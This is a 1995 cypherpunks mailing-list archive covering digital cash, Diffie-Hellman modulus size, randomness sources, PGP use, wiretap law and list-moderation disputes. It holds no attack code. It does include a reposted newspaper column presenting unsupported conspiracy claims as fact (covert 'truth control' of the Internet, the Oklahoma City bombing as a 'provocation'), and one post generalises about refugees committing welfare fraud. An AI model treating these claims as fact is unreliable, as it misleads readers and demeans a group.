     Julie Rackliffe, a friend of mine in "Development" at the Computer Museum,
     to come along so I would know at least one person there. When I got
     there, I saw Dave Lash again. Small world.

     Besides the usual groceries, Bob had a big bunch of posterboard on a
     on his dining room table, and another piece of posterboard on his
     fireplace mantle. There were a bunch of questions on the table's poster,
     and one was about winners and loosers. I said that digital
     financial certificate underwriters would be the winners, and that
     loosers would be companies which depended on large information
     hierarchies. There was a question about anonymity, and I quoted
     Gilmore on network damage again.  On the fireplace mantle was this
     posterboard with an org chart with business-card sized blank boxes
     all over it. One side of the pyramid said "Client", the other side
     said "Server", and so I drew a big cloud off to the side with the
     label "Crypto-Anarchist" in it, and put my card there. A few people
     moved their cards into the cloud. I was rather pleased with myself...

     I went upstairs where I met John Levine, who was in the PBS internet
     special last year, and Margy Levine Young, who wrote "The Internet for
     Windows for Dummies Starter Kit" in a room with a Windows box, a bonded
     ISDN connection and a wall projector. I showed a few people the e$
     web-page, met the author of the refrigerator magnets page, and found
     out the John and Margy were fellow Unitarians, and that Margy's husband
     is the UU webmaster. We're everywhere, we're everywhere.

     I went up to the third floor, where by that time they were serving
     coffee and dessert, and Bob Metcalfe was there reccommending desserts
     to people. By that time I was talking to a trust officer at a very
     large institutional trustee bank here in Boston about how to
     underwrite digital cash. This guy was sympathetic because what he
     really wanted to do was chuck it all and go to work for Open Market. I
     told him that the next best thing was to let me come in and evangelize
     his bank a bit. He agreed. Dubiously. Anyway, He wants to come to
     lunch at BSDC, probably to schmooze the Open Market folks.  So while
     I was standing there waiting for coffee, I told Metcalfe about
     getting a feature article into his magazine.  One thing led to
     another, and the next thing I know, we're up another flight of
     stairs, and I'm dumping core again, this time about 10 steps from
     ARP-1, the original ARPANet transponder.  Oh. Metcalfe uses a Mac,
     even though his internet feed is to a Wintel box.

     Metcalfe first starts off with a few coy questions about Phiber
     Optik, and Phil Zimmerman, and he figures out that my interest in
     cryptography is pretty much in its financial implications. So, for the
     better part of half an hour, he's quizzing me about stuff like
     digital cash, digital certificates and financial disintermediation,
     and pretty much the whole geodesic market rant.  He says he likes
     "Mr., Doctor, Doctor, Huber's" stuff, a reference to Huber's
     hypercredentialed resume.  He talked about these crazy people who
     were creating a secondary market in Digicash's beta certificates,
     so I told him about Lucky Green, Rich Lethin and how all of us
     created ecm.

     I told Metcalfe about reputation capital, and, when he talked about
     the evils of anonymity, I talk about how on the net, a key pair *is* your
     identity, and about Tim May's cryptoanarchy stuff.  I told him about
     BSDC and asked about him speaking sometime, but he says he's working
     on a conference and a book, and his wife will kill him if he starts
     making speeches again.  He wanted on the BSDC list, though, so I'm
     going to subscribe him and see what happens. I also said I'd mail him
     the e$ URL.

10:45
     I get home and after telling Carol all about my day, I still can't
     sleep, so I jump on the net and filter cypherpunks for buyinfo, and
     then answer some mail from my college roomate, who found me last
     week.  He's a commander in the Navy who's now flying planes at
     McMurdo Sound in Antarctica.  I shot him back a message and told him
     about the e$ web-page, which he's going to have to sneak into another
     office to look at some other night, ;-), and I told him that I was
     writing this and would send it to him when I was through.

     I still wasn't sleepy, so I plinked on the development version of the
     e$ page with the new picture, and when I was done with that, I read
     news, and, in reply to a comment I posted on soc.culture.alaska (I
     spent middle school in Anchorage), I get a reply from Mr. Pickett, my
     7th and 8th grade science teacher, and my favorite science teacher on
     the whole planet.  Since I had just put a picture on my web-page, I
     put the development page's URL on the message so he could see what I
     looked like now.

1:45
     I finally go to sleep.




Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJkyyfgyLN8bw6ZVAQFVAAP/Xmkp7H28Q/DfRCqMWiYboEo53T84hOIP
n6pM/jjC1XAqf9E1v/i5PRQmCylyoJELEzsq3ET02bs4Wi25tS80dcm6oMHoHtAn
1SFCr6hHGIOxmLPJ+XnKCJgpKZEheLGqsG50ZEos26kQ3O4hD3bjZr5WcEyYFAGi
38i5yTwXR9A=
=fKyZ
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From fc at all.net  Sun Nov  5 04:13:30 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Sun, 5 Nov 1995 20:13:30 +0800
Subject: lp (134.222.35.2)?
In-Reply-To: <199511050653.WAA17662@xenon.chromatic.com>
Message-ID: <9511051204.AA10691@all.net>


...
> It would be fun (perhaps horrible) to see what the NSA does the first
> time Isreal or France set up their own high capacity long distance to
> other friendly/unfriendly countries (thus bypassing the US completely).
> Second, let France or some other country set up major Internet routing
> clearinghouses which advertise secure routes to other nations (not US).

I hope nobody would believe that either France or Israel would provide
secure communications.  France has a global reputation for industrial
espionage, and Israel almost certainly listens to all the traffic it
can.  That's probably true of most industrialized nations in today's world.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From asgaard at sos.sll.se  Sun Nov  5 04:47:28 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Sun, 5 Nov 1995 20:47:28 +0800
Subject: Credentials Without Identity
In-Reply-To: <acc1ae3828021004292e@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.951105123707.4854A-100000@cor.sos.sll.se>


(PRIVATE mail, taken from the cp-list)

I choose to make these 'off-topic' comments off the record:
 
(By the way, please keep on 'crypto-moderating' the list
 your way; it makes much more sense - and is much more
 effective! - than Perry's.)
 
> Fortunately, I have heard there is a "right wing" backlash growing in some
> of the Scandinavian countries, especially Norway and Denmark. ("Right wing"
> is what the press calls it...I hope it's really "anti-left wing,"
> anti-cradle-to-grave-socialism.)

Well, also in Sweden, but this is merely against tax money transfered to
the 'less fortunate' (or 'lazy', as you sometimes call them) and is very
little, if at all, connected to anti-surveillance. Cross-referencing
various databases would actually be good for catching those who receive,
for example, unemploment money while actually working full time (especially
common amongst Mediterranian and Middle East 'political' refugees - many
of whom like to come here and work for a handful of years, sometimes adding
a decade to their actual age so they can go home to a warm climate at 55
to live as kings on their Swedish pensions). Isn't this a dilemma, also at
your home turf? FINCEN efficiency might save some of your tax dollars.

> To my surprise, several people on this list have expressed support for the
> need for so-called "data privacy laws." I look at it this way: if I put

I completely agree with you - actually, I think I took over some arguments
from you on this subject long ago - that these laws are bullshit.

> lists. Ironically, the Cypherpunks mailing list might be illegal in the
> U.K. unless the legal forms were properly filled out, the fees paid, the
> parties notified on a regular basis of information about them, etc. And our

This applies very much so in Sweden too. It *is* illegal to maintain any
database with 'information on persons' (like their email addresses) without
approval from the Data Inspection. But it's an open secret that this law
is broken on a massive front and no bureaucrat is really trying to uphold it.

> "Disneyland with a death penalty"

Yes, we live in interesting times.


Mats






From usura at utopia.hacktic.nl  Sun Nov  5 05:40:33 1995
From: usura at utopia.hacktic.nl (Alex de Joode)
Date: Sun, 5 Nov 1995 21:40:33 +0800
Subject: lp (134.222.35.2)?
Message-ID: <199511051334.OAA22080@utopia.hacktic.nl>



[..]
: This is silly.  If the NSA were monitoring traffic with the consent of
: EUnet and UUNET (and note that EUnet is owned by UUNET rival PSI), they
: wouldn't need to play these routing games; they'd just eavesdrop at an
: interconnect or on the leased lines leading into it, run a rough filter
: over it to cut down volume, and tunnel the traffic home through other
: channels (probably satellite).  And if they were monitoring without the
: consent of UUNET and EUnet, they still wouldn't play these games because
: the providers would be upset about the unexpected load on the expensive
: and overloaded transatlantic pipes.

PSI has an 11% stake in EUnet, since they took over EUnet Britain, 11% doesn't
qualify as 'owning' where I live.

Regards,
-AJ-






From andreas at artcom.de  Sun Nov  5 06:35:17 1995
From: andreas at artcom.de (Andreas Bogk)
Date: Sun, 5 Nov 1995 22:35:17 +0800
Subject: New release of CFS Unix encrypting file system available
In-Reply-To: <9510271856.AA24314@merckx.info.att.com>
Message-ID: <m0tAfXb-0002duC@horten>


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Matt" == Matt Blaze <mab at research.att.com> writes:

    Matt> Source code for the latest version (release 1.3.1) of CFS,
    Matt> the Cryptographic File System, is now available upon request
    Matt> for research and experimental use in the US and Canada.

Please report any leakage of this software immediately to this list.

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMJeY2EyjTSyISdw9AQFD7AP/SghCAohL5yJP6kgwz2W45zuexFkh1gQO
s32CaBQqTEGLir7S5llYd53Eiof/y6JDCEDao9B45Tcz8IKtW2YhPbAOrRLS1dnp
G8GTRL31R/LtqUaKcn/VqgV+sa6dwMWtelPnrYoFhtS5mxmBXP00nCca+PWfw8kt
EadgTZtIYyc=
=PgXu
-----END PGP SIGNATURE-----





From sinclai at ecf.toronto.edu  Sun Nov  5 06:58:37 1995
From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N)
Date: Sun, 5 Nov 1995 22:58:37 +0800
Subject: Video as a source of randomness
In-Reply-To: <199511042352.PAA07530@ix4.ix.netcom.com>
Message-ID: <95Nov5.095208edt.917@cannon.ecf.toronto.edu>


The cheapest strong source of video noise that I can think of would be
a small fan with a ribbon tied to the grille.  As long as it's in a
turbulent flow regime, you'll get very random numbers at a fast
rate.





From perry at piermont.com  Sun Nov  5 08:14:44 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 00:14:44 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <1973.bsimpson@morningstar.com>
Message-ID: <199511051607.LAA08575@jekyll.piermont.com>



"William Allen Simpson" writes:
> Folks, I was somewhat disappointed in the response to our previous
> requests for verification of the strength of the prime moduli.
> 
> Recently, someone asked for a smaller prime of only 512-bits for speed.
> This is more than enough for the strength of keys needed for DES, 3DES,
> MD5 and SHA.  Perhaps this would be easier to have more complete and
> robust verification as well.

I think that this is a very large mistake. Allow me to explain why.

La Macchia (sp?) and Odlyzko (sp?) have a very nice result which shows
that once you've done enough precalculation on a particular modulus,
you can break any subsequent Diffie-Hellman operation performed on
that modulus with (for our purposes) no effort. 512 bits is, from what
I can tell, not far out of the realm of possibility for what someone
could try to crack with current machines given enough effort.

[Sorry about the spelling. I'm tired, and don't have time to look up
your names. I know that Brian at least reads this list and I'm sorry
about likely misspelling your name.]

Perry





From perry at piermont.com  Sun Nov  5 08:19:20 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 00:19:20 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <Pine.SUN.3.91.951104155911.2413A-100000@fourier>
Message-ID: <199511051611.LAA08586@jekyll.piermont.com>



James Black writes:
>   I am in a discussion (during the week) with a system administrator 
> about seeing if we can just make PGP publically available to everyone, 
> but now the discussion seems to be to just allow PGP to do digital 
> signatures, and I don't think that is the best choice, then.  They are 
> not against PGP being used, but there are legal issues as to whether they 
> can offer it to everyone, as some students are international students, 
> and are not allowed to use the version for the US, or so I have been 
> informed, so now I need to see if we can have the international version, 
> so these students can use it. :(

Actually, nothing in the ITAR says foreigners can't USE the
U.S. version of PGP, just that you can't give them the software.

However, I think it is a bad idea to make PGP available on a multiuser
computer. It encourages a very, very bad habit -- that of using PGP on
a multiuser computer....

> What they are trying to do is make certain that no 
> one can send a message to anyone, claim to be in the faculty, and cause 
> problems that way.

But since you are using this software on a multiuser computer over
likely insecure lines, or, even worse, over an insecure LAN, all you
are going to do is make things even stickier when someone steals a key
and starts pretending to be some faculty member anyway.

Don't use public key software on untrusted hardware over insecure
links. Its a BAD BAD BAD thing.

Perry





From perry at piermont.com  Sun Nov  5 08:26:48 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 00:26:48 +0800
Subject: consumer products that make nice sources
In-Reply-To: <v02120d00acc195427273@[205.164.159.32]>
Message-ID: <199511051620.LAA08607@jekyll.piermont.com>



Lots of people are discussing all sorts of weird souces of radioactive
material to use in a detector for an RNG.

None of this is necessary. Scientific supply houses will happily sell
you small calibrated sources for use in your lab, classroom, or in our
case, machine room (:-).  There is no need to find objects to
dismantle or silly dangerous radioactive sources. You can get a source
that produces exactly as much activity as you need very cheaply.

Perry





From dl at hplyot.obspm.fr  Sun Nov  5 08:33:44 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Mon, 6 Nov 1995 00:33:44 +0800
Subject: S/KEY available for HP48 handheld calc
Message-ID: <9511051627.AA15400@hplyot.obspm.fr>


-----BEGIN PGP SIGNED MESSAGE-----


Steve VanDevender (<stevev at greylady.uoregon.edu>) made available (GNU
GPL) an S/KEY implementation for the nice HP hand held calc,
It works very nice with both MD4 and MD5 based system (I personnaly
tested with my MD4 based logdaemon-4.9, the author recommend OPIE's
one)

I've put his stuff on my anonymous ftp, you can fetch the stuff
starting on 
  ftp://ftp.box.eu.org/hp48/skey/
(ftp.box.eu.org=hplyot.obspm.fr=145.238.44.5)
the executable I got from usenet has the following MD5 digest:
1b2613383708d4825f5842ed3e630d40  skey

I hear you can get an hp48 for $30 in the Us (I paid my hp48g US$230
when it came out in France two years ago),
So no more excuse of clear passwd over the net ! [nor to sell 'smart
cards' mega bucks!]

ps: Who write PGP for hp48 now ;-) ? 
[or maybe more seriously some skey hooks to it ?]

dl
- --
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Panama South Africa DST domestic disruption counter-intelligence
 cracking Legion of Doom

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMJzlz3k52/beodHxAQEAGQP/XcX3mOw8YIVKe3kEuUkRb6wjB7JAvTi3
t/aQNAT/LQR4ZCx954HbqS231P3qxuz2Hc88xs7HAfbzk91C6VQ9J/r1+C7yBMiR
Jlk19lnWny8yHlkwm8KzF1TvqnZ6LvnGgLoiq5ExJIGJpRyJUf912LZf8N06tyFG
IJs8ZcN8/Kk=
=6RT6
-----END PGP SIGNATURE-----





From perry at piermont.com  Sun Nov  5 08:46:11 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 00:46:11 +0800
Subject: Credentials Without Identity
In-Reply-To: <acc154b62202100420bc@[205.199.118.202]>
Message-ID: <199511051639.LAA08639@jekyll.piermont.com>



Timothy C. May writes:
> (And as a measure of how apologetic some folks are getting about discussing
> anything not on Perry's List of Approved Topics,
[....]
> In fact, the issue of credentials
> and identity is NOT off-topic, not even semi-off-topic. It is central to
> the themes of our list. I urge all to read Chaum's seminal work on
> "credentials without identity.")

I've repeatedly stated, Tim, that my problem is with junk, not with
stuff on list charter. You can claim anything you like about my
statements, but it won't be true. Any statement to the effect that I'm
against discussion of anonymous credentials is a "big lie" -- an
attempt to distort what I have said by being sufficiently outrageous.

Repeating, I am troubled by people posting stuff about whether
roadways should be privatized -- I am perfectly happy with discussion
of Chaumian anonymous credentials. My problem is with people who think
this is Libernet, or Waconet, or Fosternet, or IBM MicroKernel net, or
Internet Investing Net, or what have you. I also find the beating of
dead horses unfortunate, but I never complain about it since its
usually technically on topic.

Now, Tim, if you feel people should be able to post their questions
about system administration of Unix boxes here, as in fact happened
only last week, please speak up.

Perry





From rah at shipwright.com  Sun Nov  5 08:46:26 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 6 Nov 1995 00:46:26 +0800
Subject: e$: 24 Hours
Message-ID: <v02120d00acc10c318f69@[199.0.65.105]>


>e$: 24 Hours

I have no idea how this got sent out twice.

However it happened, I apologize.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From perry at piermont.com  Sun Nov  5 08:55:55 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 00:55:55 +0800
Subject: Telephone switch capacity -Reply
In-Reply-To: <v02120d02acc1d4859dfc@[192.0.2.1]>
Message-ID: <199511051645.LAA08650@jekyll.piermont.com>



Lucky Green writes:
> One more time. Despite what you read in the papers, despite what most
> people - even in the legal profession - believe, telephone wiretaps do
> _not_ require a court order. They haven't required a court order in over a
> year.

They never required a conventional court order. This was not new. They
always had a national security escape clause. However, at least they
cannot be used in court unless there was a court order involved, and
the process of getting "legitimate" authorization to, say, bug the
embassy phones, does require that certain forms be followed.

The real problem, IMHO, is that people can avoid the formalities
entirely and simply unlawfully wiretap, and that tracing such attempts
is hard.

Perry





From bshantz at nwlink.com  Sun Nov  5 09:08:48 1995
From: bshantz at nwlink.com (Brad Shantz)
Date: Mon, 6 Nov 1995 01:08:48 +0800
Subject: Tim, Perry, it's gettin' real old.
Message-ID: <9511051657.AA22854@toad.com>


Tim May, Perry Metzger, on the topic of off topic things, I think this
little flame war of yours can be taken offline.  It's getting real old
watching two grown men fling mud at each other.  That's why I don't watch
Presidential debates anymore.  (Although I did enjoy Admiral Stockdale
turning off his hearing aid when Quayle and Gore were bitching at each other.)

This is the last I'll say on the subject.

The wonders of freedom allow me to delete any threads I don't want to read.
And I exercise that right frequently.

Grow up, boys.

Brad






From perry at piermont.com  Sun Nov  5 09:21:03 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 01:21:03 +0800
Subject: using pgp to make an otp
In-Reply-To: <Pine.SOL.3.91.951104211722.6970F-100000@chivalry>
Message-ID: <199511051710.MAA08683@jekyll.piermont.com>



Simon Spero writes:
> On the subject of reused one-time-pads: What are the attacks that become 
> available if a pad is used two times. The ones I can think of are:

I will point out that the NSA's VENONA project, which among other
things lead indirectly to the execution of the Rosenbergs, got its
only break from the two time use of one time pads by the Soviet
spies. I can't guess all the techniques they used, but obviously there
are enough things you can do to make it dangerous.

Perry





From perry at piermont.com  Sun Nov  5 09:22:05 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 01:22:05 +0800
Subject: lp (134.222.35.2)?
In-Reply-To: <199511050620.HAA14046@utopia.hacktic.nl>
Message-ID: <199511051713.MAA08691@jekyll.piermont.com>



Anonymous writes:
> >  Notice that both messages went through an unnamed site -- 134.222.9.1 and
> >  then a strangely-named site, "lp (134.222.35.2)"
[...]
> >  Now let me see ... which spy agencies are located in or near Virginia?

The existance of MAE East in Virginia is far more significant.

I'm sure the spooks are spying, but they are likely just tapping
lines. Machines that don't have proper reverse maps show up every day
in large networks and aren't something to worry about. Your posting is
based on the premise that this unnamed machine is of significance --
and it almost certainly isn't of any significance.

Quit looking for the spooks where they aren't. You should always
assume your line is being tapped if you are saying something you don't
want heard, anway.

Perry





From habs at warwick.com  Sun Nov  5 09:52:10 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Mon, 6 Nov 1995 01:52:10 +0800
Subject: Public Reviews of CheckFree Wallet system?
Message-ID: <199511051743.MAA11416@cmyk.warwick.com>


Here is some more information on the Checkfree Wallet (tm) system. I've
learn about it from some reporting I've been doing on it..

1) Has there been any public review of this product?

Here is the basic run down

It uses a 768-bit key. They claim it is not escrow-ed with the US
government. It is export able to most countries except for Sudan, Cuba,
North Korea, Syria, Libya, Iraq ot Iran.

It encrypts limited bits of information (like Credit Card Numbers)
which is why they claim it was able to get export approval.

User configures the Wallet(tm) by downloading and installing and
configuring it. It works with Proxy servers which I have
successfully tested.

It generates a public and private key pair using RSA technology.

It keeps the payer anonymous to the merchant via the internet. Merchants can learn the payer's name out of band (e.g., by phone).

No credit card info is stored on a merchant's site.

Payment is encrypted and signed buy the payer and sent to the merchant
who add's there version of the transaction and their signature. It is
forwarded to check free who then decrypt, compare the payers' and
merchant's view of the transaction and if they agree process it.

It use is very very quick and easy. It auto configures itself to
Netscape. Payment information is sent to the Wallet (TM) from the
merchant in a Mime segment, which triggers a launch of the Wallet, the
payer binds in their credit card data (all ready at Checkfree (at
installation) e.g., which card to use. Then the whole thing is sent to
the merchant then the onto Checkfree for processing as indicated
above.

I was very impressed with the software and it's easy of use. Currently
only works on Windows but soon on the Mac..

/hawk

  --
                Harry Hawk
                Manager of Interactive Communications
                Warwick Baker & Fiore
                212 941 4438
                habs at warwick.com





From tcmay at got.net  Sun Nov  5 10:01:20 1995
From: tcmay at got.net (Timothy C. May)
Date: Mon, 6 Nov 1995 02:01:20 +0800
Subject: "The Policeman Inside"
Message-ID: <acc2319202021004e8ac@[205.199.118.202]>


At 12:35 PM 11/5/95, Mats Bergstrom wrote:

>Well, also in Sweden, but this is merely against tax money transfered to
>the 'less fortunate' (or 'lazy', as you sometimes call them) and is very
>little, if at all, connected to anti-surveillance. Cross-referencing
>various databases would actually be good for catching those who receive,
>for example, unemploment money while actually working full time (especially
>common amongst Mediterranian and Middle East 'political' refugees - many
>of whom like to come here and work for a handful of years, sometimes adding
>a decade to their actual age so they can go home to a warm climate at 55
>to live as kings on their Swedish pensions). Isn't this a dilemma, also at
>your home turf? FINCEN efficiency might save some of your tax dollars.
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Mats' point is an important issue to think about. The "conservative" who
wants to get the bums off welfare and keep his hard-earned kroners or
francs may embrace a FinCEN-type computerized police state. In a system of
extensive transfer payments, such "person number" tracking is needed to
ensure that Citizen Units do not make double claims, do not retire before
they have made their full productive contribution to the welfare of the
herd, and so on.

A "libertarian" would argue that when economic interactions are uncoerced,
when there are few if any lay-abouts collecting food stamps, welfare, AFDC,
WICC, generous pensions paid by taxpayers, etc., then the "need" for
Citizen Unit identification vanishes.

This actually has some crypto relevance, besides the obvious crypto anarchy
connections. Nameley, parallels with "offline" and "online" clearing.

A system in which pieces of paper and various promissory notes are
transferred around as money, with later (offline) clearing, tends to
require True Names. This so that defaulting parties can be tracked down and
collected from. (And of course there are also tax issues, and regulatory
issues, but I'm concentrating on the offline or deferred clearing issues
that tend to make True Names and physical identities more important.)

By contrast, a cash economy--online or immediate clearing--tends to not
require identification. "Cash and carry," which has worked for millenia in
diverse cultures which have no forms of identification. One pays in corn,
or beads, or gold, and that's that.  (There are, as Futplex noted I like to
say, "lots of issues." We could discuss exceptions to this, such as
contracts, age credentials, etc. But, generally, cash transactions tend to
produce no compelling need for identification. This is the norm in most
retail transactions, unless "checks" or other forms of deferred clearing
payment are tendered.)

The modern "identity state" is becoming consumed with the notion that
everyone needs an index number. Not necessarily because the police want to
compile dossiers on them (though this is a factor), but because of the
focus on rules and regulations which affect _monetary flows based on
identity_.

In the U.S. for example, one used to just be able to pay someone to cut
one's lawn in cash (or check, if he trusted you, blah blah) or babysit
one's children. Now, under new crackdowns on social security laws, income
tax estimated payment laws, hiring of undocumented workers laws, etc., this
is technically no longer possible. One must, above some tiny threshold of
payments, file various tax and social security forms, and take steps to
ensure the worker is properly documented (*)

(* Most white people in America have little "proof" that they are proper
Citizen Units. This leads to uncomfortable situations where only brown- and
yellow-skinned persons are asked to prove their identities and their
Citizen Unit or Resident Unit status.)

There is strong pressure on several fronts to establish a "National
Identification Card." Others are opposed.

My point, originally, to Rich Graves' mention of Chris Hibbert's excellent
FAQ on Social Security Numbers and person numbers, is that it is no longer
relevant to fight against a "single index number." Modern data base methods
are so well-suited to cross-indexing that it hardly matters whether there's
a single point of entry to the data base or not.

THE KEY POINT IS THIS: Are voluntary economic transactions between persons
to be subject to approval and regulation by the State? If babysitting and
lawnmowing, not to mention hiring someone to write some C code, requires
submitting tax and Social Security forms, requires checking the J-1 vs.
Permanent Resident vs. Approved Citizen Unit status, then the die is cast.

Ordinarily, or in earlier years, these rules might have been dismissed as
trivial or as mostly ignorable. After all, so long as one is not planning
to become Attorney General, who cares whether a housekeeper was "legal" or
not? Who cares whether the detailed Social Security, IRS, and Immigration
Control forms were filled out properly, or at all?

Well, the State is becoming more efficient in tracking such things, and tax
penalties are increasing. Further, bounties are being paid to those who
inform on "tax cheats." Computerized records are being used to spot those
with "apparent incomes" (= lifestyles) inconsistent with their tax filing
status.

Sure, part of this is to catch "double dippers," such as those collecting
unemployment, welfare, AFDC, disability benefits while also doing work on
the side. (There's a whole issue here of the laws about welfare recipients
not being allowed to work, which I won't get into.)

But the danger, and something that should inform our Cypherpunks
discussions, is that these laws which are tied to one's status as a Person
Unit in the system, inevitably require an extensive "identity tracking"
regimen.

The libertarian and anarcho-capitalist solution is not to increase the
power of the surveillance state to detect fraud and non-compliance, but to
roll things back to a more even keel.

Even if one believes taxes are "the price paid for civilization," there are
superior alternatives to the current system. (My current favorite is:
mandatory slavery for X days per year, regardless of age or ability.
Instead of taxes, everyone works one day in five, or 2 months out of the
year, etc., for the herd. Building roads, picking up trash, administering
computers, etc. There are "lots of issues," but even I agree this list is
not the best place to discuss it; I mention it in passing.)

In closing, we must beware "the policeman inside," to use the William
Burroughs term. A surveillance state that arises because modern computers
and data bases allow all economic transactions to be monitored, taxed, and
approved or disapproved is a horror we should fight with all of our
resources. Whether right-, left-, or libertarian-leaning, the implications
of this state power to control our lives are horrible.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From anonymous-remailer at shell.portal.com  Sun Nov  5 10:03:06 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 6 Nov 1995 02:03:06 +0800
Subject: censored? corrected
Message-ID: <199511020847.AAA10833@jobe.shell.portal.com>


NOTE: More than 8 hours have passed since I sent this text in plaintext
directly to Cypherpunks without its being posted, so in this attempt I am
sending it encrypted through ALUMNI remailer. - Gary Jeffers
gjeffers at socketis.net


                    INFO BLACKOUT

 From THE SPOTLIGHT newspaper's TECHNOLOGY & LIBERTY column by Clark
Matthews - Nov. 06, 1995 issue.

   Powerful national security insiders have established effective control
over the entrance gateways to Internet. Disturbing signs are now emerging
that the "information superhighway" has been targeted for systematic sur-
veillance and political dossier-building on Americans' opinions.

   This ominous news came in the first of a series of articles by investi-
gative journalist Steven Pizzo in WEB REVIEW, an online magazine of cyber-
culture and politics (http://gnn.com/wr/) published by Songline Studios of
San Francisco. Pizzo is the author of INSIDE JOB, a groundbreaking expose'
on the massive fraud and theft of insured deposits in 1980s savings and
loan debacle.

   According to Pizzo, control of Internet "domain name registration" has
passed into private hands-with the potential for serious mischief or
worse. "Domain names" are the odd looking identifying names that are as-
signed to individual computer systems that compose the Internet (logoplex.
com, for example).

   Through a complex chain of licensing arrangements and corporate acqui-
sitions detailed in Pizzo's article, this crucial control over Internet
domain names has passed from the non-profit National Science Foundation to
Network Solutions, Inc. (NSI) of Herndon, Virginia. Last May, amid growing
public disbelief of Establishment media reports about the Oklahoma City
bombing provocation, NSI was purchased by Scientific Applications Interna-
tional Corporation (SAIC) of San Diego.

   SAIC is a $2 billion defense and FBI contractor with a board of direc-
tors that reads like a Who's Who of the intelligence community. Board
members include Admiral Bobby Ray Inman, the former director of the Na-
tional Security Agency (NSA) and deputy director of the CIA; Melvin Laird,
defense secretary under Richard Nixon; Donald Hicks, former head of re-
search & development for the Pentagon; Donald Kerr, former head of the Los
Alamos National Laboratory; and Gen. Maxwell Thurman (ret.), the commander
of the U.S. invasion of Panama.

   Former members of SAIC's board include Robert Gates, the former CIA
director under George Bush; current CIA director John Deutch; Anita Jones,
Deutch's former Pentagon procurement officer, and William Perry, the pre-
sent secretary of defense.

   The corporation also has a legion of computer network specialists and
an entire division of computer consultants. SAIC currently holds contracts
for re-engineering the Pentagon's information systems, automating the
FBI'S computerized fingerprint identification system, and building a na-
tional criminal history infomation system.

   The Internet is a marvel of computer software technology. It was de-
signed to survive a nuclear attack on the United States-like the Post
Office, it's literally smart enough to find a way to get the mail through,
even if most of the network is missing.

   But control of Internet domain name registration means the ability to
remove troublesome-or outspoken-computer systems from the network. Po-
tentially, this control also confers the power to insinuate "phantom"
domains into the network-for surveillance purposes, for example-or for
real-time, automatic censorship.

   Furthermore, anecdotal evidence gathered by this author suggests that
actual "truth control" is taking place on the 'net now. E-mail messages
with controversial contents-including the details of the SAIC takover of
domain names-have consistently disappeared as they travel across the net-
work. News items concerning the Vincent Foster "suicide" investigation
and allegations of NSA bank spying through compromised Inslaw software are
being quickly and automatically canceled. And the cancellations are not by
by their authors.

CRACKDOWN

   With domain names under the control of secret government insiders, it
is even theoretically possible that large parts of the Internet could be
SHUT DOWN AND SILENCED at critical times. This could be accomplished by
suddenly altering domain name registrations or interposing compromised
"domains" at crucial points.

   These compromised systems could serve as "black holes" at critical
times, stopping e-mail and important news from reaching the world-or the
rest of the country.

   Exercises in "turning the Internet off" have already taken place in
Taiwan and Hong Kong. In Taiwan, the 'net was successfully shut down.
All network traffic-including news, opinions and e-mail sent by computer
users-was successfully "bottled up" on the island and prevented from
reaching the world.

   In Hong Kong, the Internet wasn't quite strangled, but the British
authorities who control that colony managed to throttle free electronic
speech with the rest of the world until everything was bottlenecked into
a few little-known satellite links.

   These are alarming precedents and sure signs that powerful, shadowy
forces are preparing to chop at the very roots of America's new Liberty
Tree. The secretive people on the board of directors of SAIC are intell-
igence professsionals skilled at manufacturing events-and then manufact-
uring public opinion and consent by controlling the truth. Will Internet
disinformation, censorship or "shutdowns" signal the next American crisis?








From edge at got.net  Sun Nov  5 10:03:07 1995
From: edge at got.net (Jay Campbell)
Date: Mon, 6 Nov 1995 02:03:07 +0800
Subject: FBI seeks huge wiretapping system
